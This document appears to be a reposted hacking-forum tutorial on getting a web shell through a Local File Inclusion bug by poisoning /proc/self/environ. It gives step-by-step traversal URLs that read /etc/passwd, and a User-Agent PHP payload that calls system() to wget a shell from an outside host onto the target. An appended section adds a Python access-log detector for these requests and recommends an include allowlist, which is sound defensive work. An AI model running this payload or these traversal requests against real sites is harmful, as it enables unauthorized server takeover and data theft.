ZeroCold

Shell via LFI


Shell via LFI - the proc/self/environ method

1 - Introduction
2 - Finding the LFI
3 - Checking whether proc/self/environ is accessible
4 - Injecting malicious code
5 - Accessing the shell
6 - Thanks

>> 1 - Introduction

In this tutorial I will show you how to obtain a shell on a site by using Local File Inclusion and injecting malicious code into proc/self/environ. It is a tutorial that explains everything step by step.

>> 2 - Finding the LFI

- Now let's find a site vulnerable to Local File Inclusion. I found a target, let's check it

www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ and the URL becomes

www.website.com/view.php?page=../

and we get an error.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

There is a good chance we have a Local File Inclusion vulnerability. Let's move on.

- Let's check whether we can access etc/passwd to see whether it is vulnerable to Local File Inclusion. Let's make a request:

www.website.com/view.php?page=../../../etc/passwd

we get an error and the etc/passwd file is not included.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

we go up a few more directories

www.website.com/view.php?page=../../../../../etc/passwd

and we have successfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking whether proc/self/environ is accessible

- Now let's see whether proc/self/environ is accessible. We will replace etc/passwd with proc/self/environ

www.website.com/view.php?page=../../../...lf/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then proc/self/environ is accessible. If you get a blank page or an error, it means it is not accessible or the operating system is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We inject the code into the User-Agent HTTP header.

Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data and make a request to the URL:

www.website.com/view.php?page=../../../ ... lf/environ

Choose Tamper and write the following code in the User-Agent field:

<?system('wget hack-bay.com -O shell.php');?>

Then submit the request.

Our command will be executed through the system() function (it will download a txt shell from http://hack-bay.com/Shells/gny.txt and save it as shell.php in the site's directory), and our shell will be created. If it does not work, try exec(), because system() may be restricted on the server in php.ini.

>> 5 - Accessing the shell

- Now let's check whether our malicious code was injected successfully. Let's see whether the shell is present.

www.website.com/shell.php

Our shell is there. The injection was carried out successfully.

Source: insecurity.ro ; Author: SirGod

Edited by ZeroCold
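
Seen from the defender's side, the requests in steps 2 to 4 leave a recognisable trail in the web server's access log. The detector below is an added example, not part of the original post; it assumes Apache's combined log format, and the log lines, IP addresses and tag names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" log line: ip, timestamp, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (..%252F -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, tags, severity) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    uri = fully_decode(m.group("uri")).replace("\\", "/")
    tags = []
    if "../" in uri:
        tags.append("traversal")
    if "etc/passwd" in uri:
        tags.append("passwd")
    if "proc/self/environ" in uri:
        tags.append("environ")
    # A PHP open tag in a header only matters if that header is later included.
    if "<?" in m.group("ua") or "<?" in m.group("referer"):
        tags.append("php-in-header")
    if {"environ", "php-in-header"} <= set(tags):
        severity = "high"    # the injection request described in section 4
    elif tags:
        severity = "medium"  # probing, as in sections 2 and 3
    else:
        severity = "none"
    return m.group("ip"), tags, severity

# Constructed sample lines (documentation IP ranges, harmless PHP in the UA).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Opera/9.80 (Windows NT 5.1; U; en)"',
    '198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php echo 1; ?>"',
]

def scan(lines):
    """Keep only the lines that produced at least one tag."""
    return [r for r in map(classify, lines) if r and r[2] != "none"]
```

Detection complements the fix rather than replacing it: view.php should map the page parameter onto a fixed allowlist of files instead of passing it to include().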